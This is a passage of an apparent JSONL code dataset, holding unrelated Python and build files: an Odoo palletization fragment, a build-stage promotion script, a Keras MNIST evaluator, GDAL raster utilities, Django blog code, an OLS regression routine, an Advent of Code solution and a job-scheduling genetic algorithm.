= self.env['hubi.palletization.line'].create(pallet_line_vals) \n \n # Update pallet_qty on hubi_palletization\n self._cr.execute(\"UPDATE hubi_palletization set pallet_qty = %s, input_qty = %s WHERE id=%s \", (uom_qty, reste, palletization_id))\n self.env.cr.commit()\n \n \n \n #@api.multi\n def action_palletization(self):\n self.env.cr.commit()\n self.create_pallet() \n \n self.ensure_one()\n view_id = self.env[\"ir.model.data\"].get_object_reference(\"hubi\", \"hubi_palletization_form\")\n \n action = self.env.ref('hubi.action_hubi_palletization').read()[0]\n ##action['views'] = [(self.env.ref('hubi.hubi_palletization_form').id, 'form')]\n action['views'] = [(view_id[1], 'form')]\n action['res_id'] = self.id\n action['res_model'] = \"sale.order\"\n \n return action\n \n #return {\"type\":\"ir.actions.act_window\",\n # \"view_mode\":\"form\",\n # \"view_type\":\"form\",\n # \"views\":[(view_id[1], \"form\")],\n # \"res_id\": 'sale.order' and self.id,\n # \"res_model\":\"sale.order\" \n # }\n \n ","sub_path":"hubi/models/palletization.py","file_name":"palletization.py","file_ext":"py","file_size_in_byte":19457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"219918512","text":"# TODO: On a general project note, the system needs a way to know when it is not possible to promote a directory ( when it is 'busy' )\n# TODO: On a very general project note, all 'raise' statements should be changed to 'sys.exit' calls with disting error codes so callers\n# TODO: On another note, make every single exit code from all scripts unique and document them in a central location\n# can automatically rectify any failures\n# promotes build stage 'source' to build stage 'destination' by performing the following steps:\n# - renaming stage 'destination' to '.destination.delete_marked'\n# - renaming stage 'source' to 'destination'\n# - copying the '.description' file in '.destination.delete_marked' to 'destination'\n# - in the event of error, 'destination' is renamed to 'source', and '.destination.delete_marked' is renamed to 'destination'\n# note, all .*.delete_marked files are cleaned up by a later job\nimport os\nimport os.path\nimport shutil\nimport sys\n\nfrom utils.stage_info import read_stage_info\nfrom utils import app_logger\n\n# exit codes\nEXIT_OK = 0\nEXIT_NO_BOOT_SCRIPT_LAUNCH = 1\nEXIT_INVALID_STAGE_NAME_PROVIDED = 2\nEXIT_SOURCE_STAGE_DOES_NOT_EXIST = 3\nEXIT_RENAMING_DESTINATION_STAGE_TO_DELETE_STAGE_FAILED = 4\nEXIT_RENAMING_SOURCE_STAGE_TO_DESTINATION_STAGE_FAILED = 5\nEXIT_RENAMING_SOURCE_STAGE_TO_DESTINATION_STAGE_ROLLBACK_FAILED = 6\nEXIT_COPYING_DESCRIPTION_FILE_FROM_DELETE_STAGE_TO_DESTINATION_STAGE_FAILED = 7\nEXIT_COPYING_DESCRIPTION_FILE_FROM_DELETE_STAGE_TO_DESTINATION_STAGE_ROLLBACK_FAILED = 8\n\n# environment variables\nENV_SOURCE_STAGE = 'BUILDER_PROMOTE_BUILD_STAGE_SOURCE_STAGE'\nENV_DESTINATION_STAGE = 'BUILDER_PROMOTE_BUILD_STAGE_DESTINATION_STAGE'\n\nENV_LAUNCHED_IN_BOOT_SCRIPT = 'BUILDER_PROMOTE_BUILD_STAGE_LAUNCHED_IN_BOOT_SCRIPT'\n\nLOGGER = None\n\nSTAGE_DESCRIPTION_FILE_NAME = '.description'\n\n# copy the description file from the delete marked stage to 'destination_stage'. 
Exit with specific exit code on failure.\n# 'source_stage' is used only in the rollback procedure and is the original 'source_stage' passed to the script\ndef copy_description_file_from_delete_marked_stage_to_destination_stage( source_stage, destination_stage ):\n    LOGGER.info( \"Copying description file located in stage folder '{}' to '{}'\".format( destination_stage.DeletionFolderName, destination_stage.Folder ) )\n\n    destination_stage_hidden_description_file = os.path.join( destination_stage.DeletionFolderName, STAGE_DESCRIPTION_FILE_NAME )\n    destination_stage_description_file = os.path.join( destination_stage.Folder, STAGE_DESCRIPTION_FILE_NAME )\n\n    try:\n        shutil.copy( destination_stage_hidden_description_file, destination_stage_description_file )\n    except Exception as error:\n        LOGGER.error( \"Copying description file failed because '{}'. Attempting rollback.\".format( error ) )\n\n        if not copy_description_file_from_delete_marked_stage_to_destination_stage_rollback( source_stage, destination_stage ):\n            LOGGER.error( \"Rollback procedure failed.\" )\n            sys.exit( EXIT_COPYING_DESCRIPTION_FILE_FROM_DELETE_STAGE_TO_DESTINATION_STAGE_ROLLBACK_FAILED )\n\n        sys.exit( EXIT_COPYING_DESCRIPTION_FILE_FROM_DELETE_STAGE_TO_DESTINATION_STAGE_FAILED )\n\n\n# rollback: move 'destination_stage' back to 'source_stage', then restore the delete-marked folder to 'destination_stage'\ndef copy_description_file_from_delete_marked_stage_to_destination_stage_rollback( source_stage, destination_stage ):\n    LOGGER.warn( \"Renaming destination build stage folder '{}' to source build stage folder '{}'\".format( destination_stage.Folder, source_stage.Folder ) )\n\n    try:\n        shutil.move( destination_stage.Folder, source_stage.Folder )\n    except Exception as error:\n        LOGGER.error( \"Rename attempt failed.\" )\n        return False\n\n    return move_source_stage_to_destination_stage_rollback( destination_stage )\n\n\n# given a stage name, get the corresponding stage object. Exit with specific error code if stage name is invalid\ndef get_stage_object( stage_name ):\n    stages = read_stage_info.load_stage_info()\n    for stage in stages:\n        if stage_name == stage.Name:\n            return stage\n\n    # since we are here, the stage name did not match a valid stage name\n    LOGGER.error( \"Provided stage name '{}' is invalid. Exiting with error.\".format( stage_name ) )\n    sys.exit( EXIT_INVALID_STAGE_NAME_PROVIDED )\n\n\n# move stage 'source_stage' to 'destination_stage'. Exit with specific exit code on failure\ndef move_source_stage_to_destination_stage( source_stage, destination_stage ):\n    LOGGER.info( \"Renaming source build stage folder '{}' to destination build stage folder '{}'\".format( source_stage.Folder, destination_stage.Folder ) )\n\n    try:\n        shutil.move( source_stage.Folder, destination_stage.Folder )\n    except Exception as error:\n        LOGGER.error( \"Rename failed because '{}'. Attempting rollback.\".format( error ) )\n\n        if not move_source_stage_to_destination_stage_rollback( destination_stage ):\n            LOGGER.error( \"Rollback procedure failed.\" )\n            sys.exit( EXIT_RENAMING_SOURCE_STAGE_TO_DESTINATION_STAGE_ROLLBACK_FAILED )\n\n        sys.exit( EXIT_RENAMING_SOURCE_STAGE_TO_DESTINATION_STAGE_FAILED )\n\n\n# mark destination stage 'destination_stage' for deletion. 
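\n#\n# For orientation, a summary of main() below: the promotion runs these three steps, in order:\n#   1. mark_destination_stage_for_deletion( destination_stage )\n#   2. move_source_stage_to_destination_stage( source_stage, destination_stage )\n#   3. copy_description_file_from_delete_marked_stage_to_destination_stage( source_stage, destination_stage )\n# Each step exits with a distinct EXIT_* code on failure, after attempting its documented rollback.\n#\n# 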
Exit with specific exit code on failure\ndef mark_destination_stage_for_deletion( destination_stage ):\n    LOGGER.info( \"Marking build stage folder '{}' for deletion by renaming to '{}'.\".format( destination_stage.Folder, destination_stage.DeletionFolderName ) )\n\n    try:\n        shutil.move( destination_stage.Folder, destination_stage.DeletionFolderName )\n    except Exception as error:\n        LOGGER.error( \"Renaming failed because '{}'.\".format( error ) )\n        sys.exit( EXIT_RENAMING_DESTINATION_STAGE_TO_DELETE_STAGE_FAILED )\n\n\n# remove the deletion suffix from stage 'destination_stage'. Returns True/False on success/failure\ndef move_source_stage_to_destination_stage_rollback( destination_stage ):\n    LOGGER.warn( \"Renaming destination stage folder '{}' to original name '{}'\".format( destination_stage.DeletionFolderName, destination_stage.Folder ) )\n\n    try:\n        shutil.move( destination_stage.DeletionFolderName, destination_stage.Folder )\n    except Exception as error:\n        LOGGER.error( \"Rename attempt failed.\" )\n        return False\n\n    return True\n\n\ndef main():\n    # don't run unless we were launched via boot script\n    if ENV_LAUNCHED_IN_BOOT_SCRIPT not in os.environ:\n        LOGGER.critical( \"promote_build_stage not launched via boot script. Exiting.\" )\n        sys.exit( EXIT_NO_BOOT_SCRIPT_LAUNCH )\n\n    LOGGER.info( \"Beginning promote_build_stage run.\" )\n\n    source_stage_name = os.environ[ ENV_SOURCE_STAGE ]\n    source_stage = get_stage_object( source_stage_name )\n\n    destination_stage_name = os.environ[ ENV_DESTINATION_STAGE ]\n    destination_stage = get_stage_object( destination_stage_name )\n\n    # do nothing if source and destination stages are the same\n    if source_stage_name == destination_stage_name:\n        LOGGER.info( \"Promoting stage '{}' to itself is a no-op.\".format( source_stage_name ) )\n        sys.exit( EXIT_OK )\n\n    # ensure the source stage exists\n    if not os.path.isdir( source_stage.Folder ):\n        LOGGER.error( \"Source stage '{}' does not exist at path '{}'. Fatal error\".format( source_stage_name, source_stage.Folder ) )\n        sys.exit( EXIT_SOURCE_STAGE_DOES_NOT_EXIST )\n\n    LOGGER.info( \"Promoting stage '{}' to '{}'\".format( source_stage_name, destination_stage_name ) )\n\n    # mark the destination stage as ready for deletion\n    mark_destination_stage_for_deletion( destination_stage )\n\n    # move the source stage to the destination stage\n    move_source_stage_to_destination_stage( source_stage, destination_stage )\n\n    # copy the description file in the deletion marked destination stage to the destination stage\n    copy_description_file_from_delete_marked_stage_to_destination_stage( source_stage, destination_stage )\n\n    LOGGER.info( \"Successfully promoted stages.\" )\n\n\nif __name__ == '__main__':\n    LOGGER = app_logger.Logger.getLogger()\n    main()\n","sub_path":"src/promote_build_stage/promote_build_stage.py","file_name":"promote_build_stage.py","file_ext":"py","file_size_in_byte":8497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
{"seq_id":"299344645","text":"################################################################################\r\n# CS 156a Bonus Exercise\r\n# Author: Aadyot Bhatnagar\r\n# Last modified: October 27, 2018\r\n# Description: A script to load and evaluate a saved Keras model's performance\r\n# on the MNIST dataset of handwritten images. 
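\r\n#\r\n# Example invocation (an illustrative sketch, not part of the original header; it assumes\r\n# a model named 'dense_arch1' was previously trained and saved under the model/ directory\r\n# this script reads from):\r\n#     python evaluate.py --model-name dense_arch1\r\n#\r\n# 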
Prints out training\r\n# and validation loss and accuracy, and also visualizes validation\r\n# images the model got wrong.\r\n################################################################################\r\n\r\nimport os\r\nimport argparse\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport tensorflow as tf\r\nimport keras\r\nfrom keras.models import model_from_json\r\nfrom keras.datasets import mnist\r\n\r\n## Parse command line arguments\r\ndef parse_args():\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument('-m', '--model-name',\r\n help='prefix for saved trained model we want to evaluate ' +\r\n '(e.g. dense_arch1, conv_regularize05, etc.)',\r\n required=True)\r\n return parser.parse_args()\r\n\r\n## Get data in a format compatible with the neural net we want to evaluate\r\ndef get_data(model):\r\n # Import the MNIST dataset using Keras\r\n (X_train, y_train), (X_test, y_test) = mnist.load_data()\r\n\r\n # Determine input shape that the model given should take\r\n input_shape = model.get_layer(index=0).input_shape\r\n\r\n # Normalize data to be in [0, 1] and reshape appropriately\r\n X_train = X_train.reshape(-1, *input_shape[1:]) / 255\r\n X_test = X_test.reshape(-1, *input_shape[1:]) / 255\r\n\r\n # Convert labels to one-hot vectors (probability distributions w/\r\n # probability 1 assigned to the correct label)\r\n y_train = keras.utils.to_categorical(y_train)\r\n y_test = keras.utils.to_categorical(y_test)\r\n\r\n return (X_train, y_train), (X_test, y_test)\r\n\r\n\r\ndef main():\r\n args = parse_args()\r\n model_name = args.model_name\r\n\r\n # Remove src from cwd if necessary\r\n cwd = os.getcwd()\r\n if os.path.basename(cwd) == 'src': cwd = os.path.dirname(cwd)\r\n\r\n # Create img directory to save images if needed\r\n os.makedirs(os.path.join(cwd, 'img'), exist_ok=True)\r\n\r\n # Create model directory to save models if needed\r\n os.makedirs(os.path.join(cwd, 'model'), exist_ok=True)\r\n model_weights_fname = os.path.join(cwd, 'model', args.model_name + '.h5')\r\n model_json_fname = os.path.join(cwd, 'model', args.model_name + '.json')\r\n\r\n # Load model and its weights\r\n with open(model_json_fname, 'r') as f: model_json = f.read()\r\n model = model_from_json(model_json)\r\n model.load_weights(model_weights_fname)\r\n\r\n # Get MNIST data shaped appropriately for the model\r\n (X_train, y_train), (X_test, y_test) = get_data(model)\r\n\r\n # Compile model and evaluate its performance on training and test data\r\n model.compile(loss='categorical_crossentropy', optimizer='adam',\r\n metrics=['accuracy'])\r\n\r\n score = model.evaluate(X_train, y_train, verbose=0)\r\n print()\r\n print('Training loss:', score[0])\r\n print('Training accuracy:', score[1])\r\n\r\n score = model.evaluate(X_test, y_test, verbose=0)\r\n print()\r\n print('Validation loss:', score[0])\r\n print('Validation accuracy:', score[1])\r\n\r\n # Determine validation examples that the model got wrong\r\n y_pred = np.array([np.argmax(y) for y in model.predict(X_test)])\r\n y_true = np.array([np.argmax(y) for y in y_test])\r\n mistakes = (y_pred != y_true)\r\n X_wrong = X_test[mistakes].reshape(-1, 28, 28) # To visualize properly\r\n y_wrong = y_pred[mistakes]\r\n y_right = y_true[mistakes]\r\n\r\n # Visualize some of the validation examples the model got wrong\r\n nrow, ncol = 3, 5\r\n for i in range(nrow):\r\n for j in range(ncol):\r\n idx = i * ncol + j\r\n plt.subplot(nrow, ncol, idx + 1)\r\n plt.imshow(X_wrong[idx], cmap='gray')\r\n plt.title('Pred: %d\\nTrue: %d' % 
(y_wrong[idx], y_right[idx]))\r\n plt.axis('off')\r\n\r\n plt.suptitle('Validation Images %s Got Wrong' % model_name)\r\n plt.savefig(os.path.join(cwd, 'img', '%s_mistakes.png') % model_name)\r\n plt.show()\r\n\r\n\r\nif __name__ == '__main__': main()\r\n","sub_path":"Neural_Net_Exercise/evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":4185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"494328804","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Nov 9 13:54:43 2020\n\n\"\"\"\nimport gdal\nimport os\nimport numpy as np\n\ndef absoluteFilePaths(directory): \n result = []\n for dirpath,_,filenames in os.walk(directory):\n for f in filenames:\n if f[-3:] == 'tif':\n result.append(os.path.abspath(os.path.join(dirpath, f))) \n return result\n\ndef calculateSingleResiduals(input_file, threshold = 0):\n residual_list =[]\n ds = gdal.Open(input_file)\n array = ds.GetRasterBand(1).ReadAsArray()\n for i in range(len(array)):\n for j in range(len(array[i])):\n pixel_value = array[i][j]\n if pixel_value != -9999000 and pixel_value > threshold:\n residual_list.append(array[i][j])\n return residual_list\n\ndef calculateResiduals(input_folder, threshold = 0):\n residual_list = []\n filename_generator = absoluteFilePaths(input_folder)\n for filename_residual_map in filename_generator:\n residual_list += calculateSingleResiduals(filename_residual_map, threshold)\n return residual_list\n \ndef calculateAbsoluteResiduals(input_folder):\n residuals_list = []\n filename_generator = absoluteFilePaths(input_folder)\n for filename_residual_map in filename_generator:\n ds = gdal.Open(filename_residual_map)\n array = ds.GetRasterBand(1).ReadAsArray()\n for i in range(len(array)):\n for j in range(len(array[i])):\n abs_pixel_value = abs(array[i][j])\n if abs_pixel_value != 9999000:\n residuals_list.append(abs_pixel_value)\n ds.FlushCache()\n return residuals_list\n\n\n#****************************************************************************#\n#* * M * A * I * N * *#\n#****************************************************************************#\n\ninput_folder_OPERA = '/thesis/data_analysis/opera/2tiff_p/2015'\n\nfilenames = absoluteFilePaths(input_folder_OPERA)\n\nsumation = []\n\nfor i, filename in enumerate(filenames): # add count 2darray\n \n ds = gdal.Open(filename)\n band = ds.GetRasterBand(1)\n array = band.ReadAsArray()\n mx = np.ma.masked_values(array, -9999000)\n\n mask_arr = np.ma.masked_where(mx < 0, mx) \n\n filesum = mask_arr.sum()\n\n sumation.append((filename, filesum))\n \ndef take_second(elem):\n return elem[1]\n\nhello = sorted(sumation, key = take_second)\n\n","sub_path":"scripts/statistics/checksum.py","file_name":"checksum.py","file_ext":"py","file_size_in_byte":2445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"280368048","text":"# 1312 소수\nif __name__ == \"__main__\":\n A, B, N = map(int, input().split())\n A %= B\n i = 1\n while True:\n A *= 10\n if i == N:\n print(A // B)\n break\n A %= B\n i += 1","sub_path":"Baekjoon/1312.py","file_name":"1312.py","file_ext":"py","file_size_in_byte":226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"451945858","text":"from models.projectors.NickelProjector import NickelProjector \nfrom models.projectors.Type2VecProjector import Type2VecProjector\nfrom torch.nn import Module, ModuleDict\n\nclass 
MultiProjectorManager(Module):\n\n def __init__(self, config):\n\n super().__init__()\n \n self.nametag = 'MultiProjectorsManager'\n\n self.setup_classes_factory()\n\t\t\n self.classes = self.get_classes(config)\n\n self.projectors = ModuleDict({k:cl(config) for k, cl in self.classes.items()})\n # print('projectors: {}'.format(self.projectors))\n\n def setup_classes_factory(self):\n self.factory_dict = {\n \"HyperbolicProjector\": NickelProjector,\n 'CosineProjector': Type2VecProjector\n }\n\n def get_classes(self, conf):\n self.names = conf[self.nametag]['PROJECTOR_CONFIGS'].split(' ')\n classes = {}\n for name in self.names:\n classes[conf[name]['NAME']] = self.factory_dict[conf[name]['Class']]\n return classes\n \n def forward(self, vec):\n projections = {}\n for k, projector in self.projectors.items():\n projections[k] = projector(vec)\n return projections\n\n\n\n","sub_path":"models/projectors/multiProjectorManager.py","file_name":"multiProjectorManager.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"316962257","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Dec 3 13:54:51 2019\r\n\r\n@author: adhan\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport cv2\r\nimport os\r\n\r\nNumKue = 1\r\njajan = 'Ape'\r\n# =============================================================================\r\n# Start\r\n# =============================================================================\r\n\r\nfor filename in os.listdir('jajanan_black/'+jajan):\r\n print(filename)\r\n img = cv2.imread('jajanan_black/'+jajan+'/'+filename)\r\n constant = cv2.copyMakeBorder(img,left = 0, right = 0,\r\n top = 500, bottom = 500,\r\n borderType = cv2.BORDER_CONSTANT,\r\n value = [0,0,0])\r\n dim = (1000,1000)\r\n resized = cv2.resize(constant, dim, interpolation = cv2.INTER_NEAREST)\r\n cv2.imwrite('jajanan_resized/'+jajan+'/'+jajan+'_resized_'+str(NumKue)+'.jpg', resized)\r\n NumKue+=1\r\nNumkue = 1","sub_path":"resize.py","file_name":"resize.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"351808526","text":"from django import forms\nfrom djrichtextfield.widgets import RichTextWidget\nfrom news.models import News\nfrom django.forms import ModelForm, Textarea, CheckboxInput\n\n\nclass NewsForm(forms.ModelForm):\n image = forms.ImageField(required=False)\n attachments = forms.FileField(required=False,\n widget=forms.ClearableFileInput(attrs={'multiple': True}))\n\n class Meta:\n model = News\n fields = ('title', 'content', 'tags', 'image')\n required = ('title', 'content')\n\n def save(self, commit=True, author=None):\n news = super(NewsForm, self).save(commit=False)\n news.author = author\n if commit:\n news.save()\n return news\n\n\nclass NewsModelForm(ModelForm):\n\n class Meta:\n model = News\n fields = ('__all__')\n widgets = {\n 'content': Textarea(\n attrs={'id': 'news_textarea'}\n ),\n 'share_on_facebook': CheckboxInput(\n attrs={'id': 'news_share_on_fb'}\n )\n }\n","sub_path":"news/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"46132207","text":"import math\nimport fire\nfrom typing import *\nimport re\nimport itertools\nfrom collections import deque\n\nfrom dataclasses import dataclass, field\nimport numpy as np\n\n\ndef _part_one(data):\n decks = data\n round = 0\n while 
True:\n if len(decks[0]) == 0 or len(decks[1]) == 0:\n break\n print(f\"round {round}\")\n c0 = decks[0].popleft()\n c1 = decks[1].popleft()\n print(f\"c0: {c0} c1: {c1}\")\n if c0 > c1:\n print(\"p0 won!\")\n decks[0].append(c0)\n decks[0].append(c1)\n elif c1 > c0:\n print(\"p1 won!\")\n decks[1].append(c1)\n decks[1].append(c0)\n else:\n raise ValueError()\n round += 1\n\n winner = decks[0] if len(decks[0]) > 0 else decks[1]\n\n return sum(\n (len(winner) - i) * c \n for i, c in enumerate(winner)\n )\n\n\n@dataclass\nclass Result:\n winner: int\n deck0: Any\n deck1: Any\n\n\ndef _recursive_combat(deck0, deck1, game):\n r = 0\n total_sets = set()\n while True:\n if len(deck0) == 0 or len(deck1) == 0:\n winner = 0 if len(deck1) == 0 else 1\n return Result(winner, deck0, deck1)\n if (tuple(deck0), tuple(deck1)) in total_sets:\n return Result(0, deck0, deck1)\n else:\n total_sets.add((tuple(deck0), tuple(deck1)))\n\n print(f\"round {r}, game {game}\")\n c0 = deck0.popleft()\n c1 = deck1.popleft()\n if c0 <= len(deck0) and c1 <= len(deck1):\n subdeck0 = deque([deck0[_] for _ in range(c0)])\n subdeck1 = deque([deck1[_] for _ in range(c1)])\n result = _recursive_combat(subdeck0, subdeck1, game+1)\n winner = result.winner\n else:\n winner = 0 if c0 > c1 else 1\n\n print(f\"c0: {c0} c1: {c1}\")\n if winner == 0:\n print(\"p0 won!\")\n deck0.append(c0)\n deck0.append(c1)\n elif winner == 1:\n print(\"p1 won!\")\n deck1.append(c1)\n deck1.append(c0)\n else:\n raise ValueError()\n\n r += 1\n \n\ndef _part_two(data):\n decks = data\n\n result = _recursive_combat(decks[0], decks[1], 0)\n\n winning_deck = result.deck0 if result.winner == 0 else result.deck1\n\n return sum(\n (len(winning_deck) - i) * c \n for i, c in enumerate(winning_deck)\n )\n\n\ndef run(fname: str, part: int):\n with open(fname, 'r') as f:\n lines = f.readlines()\n\n data = [deque(), deque()]\n player = 0\n for line in lines:\n if line.startswith('Player'):\n continue\n if line.strip() == '':\n player += 1\n continue\n\n data[player].append(int(line.strip()))\n\n print(str(data))\n\n if part == 1:\n r = _part_one(data)\n print('part 1: ' + str(r))\n elif part == 2:\n r = _part_two(data)\n print('part 2: ' + str(r))\n else:\n print(f\"Missing part: {part}\")\n\n\nif __name__ == '__main__':\n fire.Fire(run)\n\n","sub_path":"day22/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":3016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"363989162","text":"# -*- Mode: python; py-indent-offset: 4; indent-tabs-mode: nil; coding: utf-8; -*-\ntop = '../..'\n\ndef build(bld):\n\n bld.objects(\n target='ndnpeek-objects',\n source=bld.path.ant_glob('ndnpeek/*.cpp', excl='ndnpeek/main.cpp'),\n use='core-objects')\n\n bld.program(\n target='../../bin/ndnpeek',\n source='ndnpeek/main.cpp',\n use='ndnpeek-objects')\n\n bld.program(\n target='../../bin/ndnpoke',\n source='ndn-poke.cpp',\n use='core-objects')\n\n ## (for unit tests)\n\n bld(name='peek-objects',\n use='ndnpeek-objects')\n","sub_path":"tools/peek/wscript","file_name":"wscript","file_ext":"","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"129826795","text":"from django.shortcuts import get_object_or_404\nfrom django.views.generic.detail import DetailView\nfrom django.views.generic.list import ListView\n\nfrom .models import BlogPost, Category\n\nclass BlogPostListView(ListView):\n \"\"\"A list view for our BlogPosts...\"\"\"\n 
template_name = 'blog/blogpost_list.html'\n\n model = BlogPost\n\n paginate_by = 10\n\n\nclass BlogPostListViewByCategory(ListView):\n template_name = 'blog/blogpost_list.html'\n\n model = BlogPost\n\n paginate_by = 10\n\n def get_queryset(self):\n self.category = get_object_or_404(Category, slug=self.kwargs[\"slug\"])\n return BlogPost.objects.filter(categories=self.category)\n\n\nclass BlogPostDetailView(DetailView):\n \"\"\"A list view for our BlogPosts...\"\"\"\n model = BlogPost\n","sub_path":"src/blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"131394725","text":"import sys\nimport math\nfrom collections import deque\n\nsys.setrecursionlimit(1000000)\nMOD = 10 ** 9 + 7\ninput = lambda: sys.stdin.readline().strip()\nNI = lambda: int(input())\nNMI = lambda: map(int, input().split())\nNLI = lambda: list(NMI())\nSI = lambda: input()\n\n\ndef main():\n\tN = NI()\n\tans = \"\"\n\twhile N != 0:\n\t\tif N % 2:\n\t\t\tans += \"1\"\n\t\t\tN = (N-1) // (-2)\n\t\telse:\n\t\t\tans += \"0\"\n\t\t\tN = N // (-2)\n\tif ans:\n\t\tprint(ans[::-1])\n\telse:\n\t\tprint(0)\n\t\t\n\nif __name__ == \"__main__\":\n\tmain()","sub_path":"Python_codes/p03286/s837339540.py","file_name":"s837339540.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"64378401","text":"#!encoding=utf-8\nimport numpy as np\nimport scipy.linalg\nfrom scipy.stats import t\n\ndef ols(y, x):\n results = {}\n nobs, nvar = x.shape\n nobs2, junk = y.shape\n if nobs != nobs2: return results\n\n results['meth'] = 'ols'\n # results['y'] = y\n results['nobs'] = nobs\n results['nvar'] = nvar\n\n if nobs <10000:\n q, r = scipy.linalg.qr(x, 0)\n r1 = r.conj().T\n xpxi = scipy.linalg.lstsq(r1.dot(r), np.eye(nvar))[0]\n else:\n x1 = x.conj().T\n xpxi = scipy.linalg.lstsq(x1.dot(x), np.eye(nvar))[0]\n\n x1 = x.conj().T\n results['beta'] = xpxi.dot(x1.dot(y))\n results['yhat'] = x.dot(results['beta'])\n results['resid'] = y - results['yhat']\n resid = results['resid'].conj().T\n sigu = resid.dot(results['resid'])\n results['sige'] = sigu/(nobs-nvar)\n diag_xpxi = np.array(np.diag(xpxi)).reshape(-1,1)\n\n tmp = results['sige'] * diag_xpxi\n sigb = np.sqrt(tmp)\n results['bstd'] = sigb\n\n tcrit = t.ppf(0.025, nobs)\n\n results['bint'] = np.array([results['beta'] - tcrit * sigb, results['beta'] + tcrit * sigb])\n results['tstat'] = results['beta'] / np.sqrt(tmp)\n\n ym = y - y.mean()\n rsqr1 = sigu\n\n ym1 = ym.conj().T\n rsqr2 = ym1.dot(ym);\n\n results['rsqr'] = 1.0 - rsqr1/rsqr2\n rsqr1 = rsqr1/(nobs-nvar)\n rsqr2 = rsqr2/(nobs-1.0)\n if rsqr2 != 0:\n results['rbar'] = 1 - (rsqr1/rsqr2)\n else:\n results['rbar'] = results['rsqr']\n\n ediff = results['resid'][1:nobs] - results['resid'][0:nobs-1]\n ediff1 = ediff.conj().T\n results['dw'] = ediff1.dot(ediff)/sigu\n\n return results\n\n\nif __name__=='__main__':\n x = open('x.csv').read()\n x = np.array([[float(i)] for i in x.split('\\r\\n') if i])\n y = open('y.csv').read()\n y = np.array([[float(i)] for i in y.split('\\r\\n') if i])\n r_ols = ols(y, x)\n\n from adf import adf\n\n\n","sub_path":"web/logic/mf/ols.py","file_name":"ols.py","file_ext":"py","file_size_in_byte":1861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"94337174","text":"''' Plot the objective-generation plot for a GA method.\r\n Help to analyse 
the performance of the GA.\r\n'''\r\nfrom datetime import datetime\r\nimport time\r\nimport numpy as np\r\nimport csv\r\nfrom geneticAlgorithm013 import select_jobs, read_job, select_prices, read_price, read_maintenance, read_product_related_characteristics\r\nfrom geneticAlgorithm013 import get_energy_cost, get_failure_cost, GA\r\n\r\nPOP_SIZE = 8 \r\nCROSS_RATE = 0.6\r\nMUTATION_RATE = 0.8\r\nN_GENERATIONS = 200\r\n\r\nif __name__ == '__main__':\r\n ''' Use start_time and end_time to determine a waiting job list from records\r\n Available range: 2016-01-19 14:21:43.910 to 2017-11-15 07:45:24.243\r\n '''\r\n start_time = datetime(2016, 11, 3, 6, 0)\r\n end_time = datetime(2016, 11, 8, 0, 0)\r\n \r\n price_dict_new = read_price(\"price.csv\")\r\n job_dict_new = select_jobs(start_time, end_time, read_job(\"jobInfoProd_ga_013.csv\"))\r\n failure_dict_new = read_maintenance(\"maintenanceInfluenceb4a4.csv\", price_dict_new)\r\n raw_material_unit_price_dict = read_product_related_characteristics(\"productProd_ga_013.csv\")\r\n\r\n \r\n DNA_SIZE = len(job_dict_new)\r\n waiting_jobs = [*job_dict_new]\r\n \r\n if not waiting_jobs:\r\n raise ValueError(\"No waiting jobs!\")\r\n else:\r\n first_start_time = job_dict_new.get(waiting_jobs[0])[1] # Find the start time of original schedule \r\n \r\n# exit()\r\n\r\n# print(waiting_jobs) \r\n# elite_cost = float('inf')\r\n# elite_schedule = []\r\n analyse_dict = {}\r\n best_schedule = []\r\n best_cost = []\r\n \r\n original_schedule = waiting_jobs \r\n analyse_dict.update({0:get_energy_cost(original_schedule, first_start_time, job_dict_new, price_dict_new, raw_material_unit_price_dict)+\r\n get_failure_cost(original_schedule, first_start_time, job_dict_new, failure_dict_new, raw_material_unit_price_dict)}) # Add origin to index 0\r\n \r\n weight1 = 1\r\n weight2 = 1\r\n start_stamp = time.time()\r\n ga = GA(dna_size=DNA_SIZE, cross_rate=CROSS_RATE, mutation_rate=MUTATION_RATE, pop_size=POP_SIZE, pop = waiting_jobs,\r\n job_dict=job_dict_new, price_dict=price_dict_new, failure_dict=failure_dict_new,\r\n product_related_characteristics_dict=raw_material_unit_price_dict, start_time=first_start_time,\r\n weight1=weight1, weight2=weight2)\r\n \r\n for generation in range(1, N_GENERATIONS+1):\r\n if (generation % 20) == 0:\r\n print(\"Gen: \", generation)\r\n pop, res = ga.evolve(1) # natural selection, crossover and mutation\r\n best_index = np.argmin(res)\r\n# print(\"Most fitted DNA: \", pop[best_index])\r\n# print(\"Most fitted cost: \", res[best_index])\r\n best_schedule = pop[best_index]\r\n best_cost = res[best_index]\r\n 